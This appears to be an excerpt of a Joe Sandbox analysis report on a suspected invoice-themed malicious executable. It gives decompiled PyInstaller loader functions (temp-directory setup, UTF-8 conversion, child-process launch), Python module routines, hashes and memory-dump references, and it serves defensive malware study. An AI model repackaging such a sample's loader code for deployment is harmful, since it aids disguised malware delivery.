                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: 8dccca6c9b6972fef0d4222bb9183904a337ce3434b5dd969785da9e639c5b16
                            • Instruction ID: 24146a5e9725ad113699d02936d09b39c3f5bc0ac5f1ebc10a20bbd7c0cfa954
                            • Opcode Fuzzy Hash: 8dccca6c9b6972fef0d4222bb9183904a337ce3434b5dd969785da9e639c5b16
                            • Instruction Fuzzy Hash: EB413AB2A00302B7E32972BC9C45F6F799CAFA565CF090436FE089614AFA55990443F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1B10, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 117COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(east_asian_width,argument,a unicode character,?), ref: 6E2F1B33
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1B48
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1C30
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: Xb/n\b/n`b/ndb/nhb/nlb/n$a unicode character$argument$east_asian_width
                            • API String ID: 3000140846-3419626597
                            • Opcode ID: 365f242b77d4e41ee5441f14888069f47d03d881b43e7d6960d67c10807f9a79
                            • Instruction ID: 1f19fcc1687440f2e4995d057c55acafde058ce0305bfa2b93742bd32611e712
                            • Opcode Fuzzy Hash: 365f242b77d4e41ee5441f14888069f47d03d881b43e7d6960d67c10807f9a79
                            • Instruction Fuzzy Hash: 05316BF27E407ACBE7044BADC841B29B7E3DB02626B484169E497CB246F324D49AC780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313980, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E01313980(short _a8192, signed int _a16384, intOrPtr _a16392) {
				short _v0;
				void* __edi;
				signed int _t14;
				signed int _t19;
				void* _t43;
				WCHAR* _t57;
				signed int _t58;
				WCHAR* _t65;
				signed int _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				E01317880();
				_t14 =  *0x133c008; // 0xa212446c
				_a16384 = _t14 ^ _t69;
				_t57 = E01314BF0(0, _a16392, 0);
				_t70 = _t69 + 0xc;
				_t82 = _t57;
				if(_t57 != 0) {
					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
					L01319803(_t57);
					_t71 = _t70 + 4;
					__eflags = _t19;
					if(__eflags != 0) {
						_t65 = E0131D518(0,  &_a8192, 0x1000);
						_t72 = _t71 + 0xc;
						__eflags = _t65;
						if(__eflags != 0) {
							E01318520(_t57,  &_v0, 0, 0x2000);
							_push(0x5c);
							_push(_t65);
							_t58 = E013188E7(_t43);
							_t73 = _t72 + 0x14;
							__eflags = _t58;
							while(_t58 != 0) {
								E0131DC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
								CreateDirectoryW( &_v0, 0);
								_t11 = _t58 + 2; // 0x2
								_push(0x5c);
								_t58 = E013188E7((_t58 - _t65 >> 1) + 1);
								_t73 = _t73 + 0x14;
								__eflags = _t58;
							}
							CreateDirectoryW(_t65, 0);
							__eflags = _a16384 ^ _t73;
							E0131786A();
							return _t65;
						} else {
							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
							E01311910(__eflags);
							__eflags = _a16384 ^ _t72 + 0x00000004;
							E0131786A();
							return 0;
						}
					} else {
						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
						E01311910(__eflags);
						__eflags = _a16384 ^ _t71 + 0x00000004;
						E0131786A();
						return 0;
					}
				} else {
					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
					E01311910(_t82);
					E0131786A();
					return 0;
				}
			}
















                            0x01313985
                            0x0131398a
                            0x01313991
                            0x013139aa
                            0x013139ac
                            0x013139af
                            0x013139b1
                            0x013139e7
                            0x013139f0
                            0x013139f5
                            0x013139f8
                            0x013139fa
                            0x01313a36
                            0x01313a38
                            0x01313a3b
                            0x01313a3d
                            0x01313a72
                            0x01313a77
                            0x01313a79
                            0x01313a85
                            0x01313a87
                            0x01313a8a
                            0x01313a8c
                            0x01313a9e
                            0x01313aad
                            0x01313aaf
                            0x01313ab2
                            0x01313aba
                            0x01313abc
                            0x01313abf
                            0x01313abf
                            0x01313ac6
                            0x01313ad4
                            0x01313ad6
                            0x01313ae1
                            0x01313a3f
                            0x01313a3f
                            0x01313a44
                            0x01313a57
                            0x01313a59
                            0x01313a64
                            0x01313a64
                            0x013139fc
                            0x013139fc
                            0x01313a01
                            0x01313a14
                            0x01313a16
                            0x01313a21
                            0x01313a21
                            0x013139b3
                            0x013139b3
                            0x013139b8
                            0x013139cc
                            0x013139d7
                            0x013139d7

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,0131210F,?,?,00000000,?,00000000), ref: 013139E7
                            Strings
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 013139B3
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 013139FC
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 01313A3F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 9ca12be93f24080f02b35f710f65d59386b7de3d6f414a36db91f98d293113d2
                            • Instruction ID: 0c432d8833810cf058dfe687b0fcf65ad26ba84c97e932b2e8611fcf4b7a2f74
                            • Opcode Fuzzy Hash: 9ca12be93f24080f02b35f710f65d59386b7de3d6f414a36db91f98d293113d2
                            • Instruction Fuzzy Hash: 3C31FEB2B403016BE238B2BCAC46F9FB389AF94664F440525FF49D7285F9749500C2DB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2400, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_Parse_SizeT.PYTHON38(?,s#:lookup,?,?), ref: 6E2F2416
                            • PyErr_SetString.PYTHON38(6E79EDB4,name too long), ref: 6E2F2441
                            • PyErr_Format.PYTHON38(6E79EDB4,undefined character name '%s',?), ref: 6E2F2475
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$Arg_FormatParse_SizeString
                            • String ID: name too long$s#:lookup$undefined character name '%s'
                            • API String ID: 1087290140-1943843822
                            • Opcode ID: 4b80e46808847fd8085970197ceef6767d30595c20d8865b82151eb17a04872f
                            • Instruction ID: 20ff748829faf07d62064c2f33067d1e7e64d5729b999fcc0464a7c47bc288e8
                            • Opcode Fuzzy Hash: 4b80e46808847fd8085970197ceef6767d30595c20d8865b82151eb17a04872f
                            • Instruction Fuzzy Hash: 5921577159000CEFDF00DBD8EC899D9776EEB06315F0401A5ED0DD6211EB729A25CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1750, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 117COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(bidirectional,argument,a unicode character,?), ref: 6E2F1773
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1788
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1870
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: a unicode character$argument$bidirectional
                            • API String ID: 3000140846-2110215792
                            • Opcode ID: c3f33892bee27a1b6cb9742cf332d7439679058ceda2ca7cbc63a065feac3810
                            • Instruction ID: 6d2eef90eee9c9c1da3e7af903316e37d29297eadc6f7714a4bbd0669609ccea
                            • Opcode Fuzzy Hash: c3f33892bee27a1b6cb9742cf332d7439679058ceda2ca7cbc63a065feac3810
                            • Instruction Fuzzy Hash: 0D316DF2FA452ECFF7004BA9C941A2977E3DF06621B4841A4E45ACB246D324D48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F19D0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 117COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(mirrored,argument,a unicode character,?), ref: 6E2F19F3
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1A08
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6E2F1AEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_ArgumentFromLongLong_ReadyUnicode_
                            • String ID: a unicode character$argument$mirrored
                            • API String ID: 4207899037-4001128513
                            • Opcode ID: acfccf6393175a2e8cd40721eb7821ed43f646a578940b073d1a373acfdd6f21
                            • Instruction ID: aa9238125f692bf4582264c952c3aef3da79b286b7b18306bf24d799be41b8b6
                            • Opcode Fuzzy Hash: acfccf6393175a2e8cd40721eb7821ed43f646a578940b073d1a373acfdd6f21
                            • Instruction Fuzzy Hash: 04316EF27F442ACBE70047ADC851B7AB3E6DF02656B884115E456CA286E324D4CAC7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314A10, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E01314A10(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				char* _t21;
				short* _t22;
				char* _t28;
				int* _t31;
				void* _t34;
				char* _t36;
				int* _t41;
				signed int _t42;
				signed int _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push(_t44 + 1);
				_t18 = E013197F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L16:
						_t31[_t44] = 0;
						return _t31;
					} else {
						_t41 = _t31;
						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 = _t21[_t41];
							 *(_t47 + 0x30) = _t22;
							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(1);
							_push(_t7);
							_t28 = E013197F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_to_utf8");
								goto L13;
							} else {
								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
								if(__eflags == 0) {
									_push("Failed to encode wchar_t as UTF-8.\n");
									L12:
									_push("WideCharToMultiByte");
									L13:
									E01311860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L01319803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L01319803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[1]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L16;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L17;
						}
						_push("Failed to get UTF-8 buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L17:
			}

















                            0x01314a10
                            0x01314a15
                            0x01314a19
                            0x01314a1e
                            0x01314a1f
                            0x01314a24
                            0x01314a26
                            0x01314a2b
                            0x01314a35
                            0x01314a37
                            0x01314a39
                            0x01314b14
                            0x01314b16
                            0x01314b24
                            0x01314a3f
                            0x01314a43
                            0x01314a45
                            0x01314a45
                            0x01314a47
                            0x01314a50
                            0x01314a50
                            0x01314a65
                            0x01314a6f
                            0x01314a71
                            0x01314a73
                            0x00000000
                            0x00000000
                            0x01314a75
                            0x01314a78
                            0x01314a7a
                            0x01314a7b
                            0x01314a80
                            0x01314a83
                            0x01314a87
                            0x01314a89
                            0x01314ac7
                            0x01314acc
                            0x00000000
                            0x01314a8b
                            0x01314aa4
                            0x01314aa6
                            0x01314ac0
                            0x01314ad8
                            0x01314ad8
                            0x01314add
                            0x01314add
                            0x01314ae2
                            0x01314ae5
                            0x01314aeb
                            0x01314aed
                            0x01314aef
                            0x01314af1
                            0x01314af4
                            0x01314af9
                            0x01314afa
                            0x01314afd
                            0x01314afd
                            0x01314af1
                            0x01314b02
                            0x01314b0a
                            0x01314b13
                            0x01314aa8
                            0x01314aac
                            0x01314aad
                            0x01314ab1
                            0x01314ab3
                            0x01314ab6
                            0x01314ab8
                            0x00000000
                            0x01314aba
                            0x01314aba
                            0x00000000
                            0x01314aba
                            0x01314ab8
                            0x01314aa6
                            0x00000000
                            0x01314a89
                            0x01314ad3
                            0x00000000
                            0x01314ad3
                            0x01314a32
                            0x01314a32
                            0x01314a32
                            0x00000000

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A9E
                            Strings
                            • Out of memory., xrefs: 01314AC7
                            • win32_utils_to_utf8, xrefs: 01314ACC
                            • WideCharToMultiByte, xrefs: 01314AD8
                            • Failed to encode wchar_t as UTF-8., xrefs: 01314AC0
                            • Failed to get UTF-8 buffer size., xrefs: 01314AD3
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: 118798e4498cc4779df6ba9b77aebd3484142f0546e4a6e427ad22b0c73ec6ab
                            • Instruction ID: 24d09bccea73a06958486961889e97851e68b99eb56601e1a8d8881c2db67000
                            • Opcode Fuzzy Hash: 118798e4498cc4779df6ba9b77aebd3484142f0546e4a6e427ad22b0c73ec6ab
                            • Instruction Fuzzy Hash: AC3182727843066BEB24AE5CAC41F5677D4EB40B1DF010139FE54B72C4E776E40483A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314400, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100processsynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E01314400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
				struct _SECURITY_ATTRIBUTES* _v0;
				signed int _t26;
				intOrPtr _t45;
				signed int _t53;
				signed int _t64;
				DWORD* _t66;
				void* _t70;

				_t70 = __eflags;
				_t62 = __edx;
				E01317880();
				_t26 =  *0x133c008; // 0xa212446c
				_a8292 = _t26 ^ _t64;
				_v0 = 0;
				E01314BF0( &_a100, _a8300, 0x1000);
				_push(1);
				_push(0x16);
				E0131EDBE(__edx, _t70);
				_push(1);
				_push(2);
				E0131EDBE(__edx, _t70);
				_push(1);
				_push(0xf);
				E0131EDBE(__edx, _t70);
				_push(1);
				_push(0x15);
				E0131EDBE(_t62, _t70);
				_a4.nLength = 0xc;
				_a8 = 0;
				_a12 = 1;
				GetStartupInfoW( &_a32);
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a76 = 0x101;
				_a80 = 1;
				_a88 = E0131E926(E013209C5(E0131A7EB(0)));
				_a92 = E0131E926(E013209C5(E0131A7EB(1)));
				_t45 = E0131E926(E013209C5(E0131A7EB(2)));
				_t66 = _t64 + 0x50;
				_a96 = _t45;
				if(CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16) == 0) {
					_push("Error creating child process!\n");
					_push("CreateProcessW");
					_t53 = E01311860(_t62, __eflags) | 0xffffffff;
					__eflags = _t53;
					E0131786A();
					return _t53;
				} else {
					WaitForSingleObject(_a16.hProcess, 0xffffffff);
					GetExitCodeProcess(_a16, _t66);
					E0131786A();
					return _v0;
				}
			}










                            0x01314400
                            0x01314400
                            0x01314405
                            0x0131440a
                            0x01314411
                            0x01314429
                            0x01314432
                            0x01314437
                            0x01314439
                            0x0131443b
                            0x01314440
                            0x01314442
                            0x01314444
                            0x01314449
                            0x0131444b
                            0x0131444d
                            0x01314452
                            0x01314454
                            0x01314456
                            0x0131445e
                            0x0131446a
                            0x01314472
                            0x0131447b
                            0x01314486
                            0x01314490
                            0x01314498
                            0x013144a0
                            0x013144a8
                            0x013144c0
                            0x013144d7
                            0x013144e7
                            0x013144ec
                            0x013144ef
                            0x01314523
                            0x01314557
                            0x0131455c
                            0x01314572
                            0x01314572
                            0x01314575
                            0x01314580
                            0x01314525
                            0x0131452b
                            0x01314539
                            0x0131454b
                            0x01314556
                            0x01314556

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 0131EDBE: SetConsoleCtrlHandler.KERNEL32(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                              • Part of subcall function 0131EDBE: GetLastError.KERNEL32 ref: 0131EEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 0131447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 0131450C
                            • CreateProcessW.KERNEL32 ref: 0131451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131452B
                            • GetExitCodeProcess.KERNEL32 ref: 01314539
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: d27dc5de27e4ee249f312bb5fbd292daae5f22da85d53ee6242b10a89d4854a4
                            • Instruction ID: 704bdd1a0a04bcccce030a883fd89d491b60972c8002e2a6817eb0aaaaccf1b2
                            • Opcode Fuzzy Hash: d27dc5de27e4ee249f312bb5fbd292daae5f22da85d53ee6242b10a89d4854a4
                            • Instruction Fuzzy Hash: C9319670504345ABE724AB78CC4EF8FB6E8AF54708F004919F985A72C4DBB9D144CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314C90, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E01314C90(char* _a4, short* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				char* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(1);
						_t20 = E013197F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to encode wchar_t as UTF-8.\n");
								_push("WideCharToMultiByte");
								E01311860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_to_utf8");
							E01311860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get UTF-8 buffer size.\n");
						_push("WideCharToMultiByte");
						E01311860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x01314c91
                            0x01314c98
                            0x01314cf8
                            0x00000000
                            0x01314c9a
                            0x01314cb0
                            0x01314cb2
                            0x01314cb4
                            0x01314ccd
                            0x01314cd0
                            0x01314cd8
                            0x01314cda
                            0x01314cdd
                            0x01314cdf
                            0x01314cfc
                            0x01314d15
                            0x01314d17
                            0x01314d34
                            0x01314d19
                            0x01314d19
                            0x01314d1e
                            0x01314d23
                            0x01314d2b
                            0x01314d2f
                            0x01314d2f
                            0x01314ce1
                            0x01314ce1
                            0x01314ce6
                            0x01314ceb
                            0x01314cf3
                            0x01314cf7
                            0x01314cf7
                            0x01314cb6
                            0x01314cb6
                            0x01314cbb
                            0x01314cc0
                            0x01314ccc
                            0x01314ccc
                            0x01314cb4

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314D0F
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
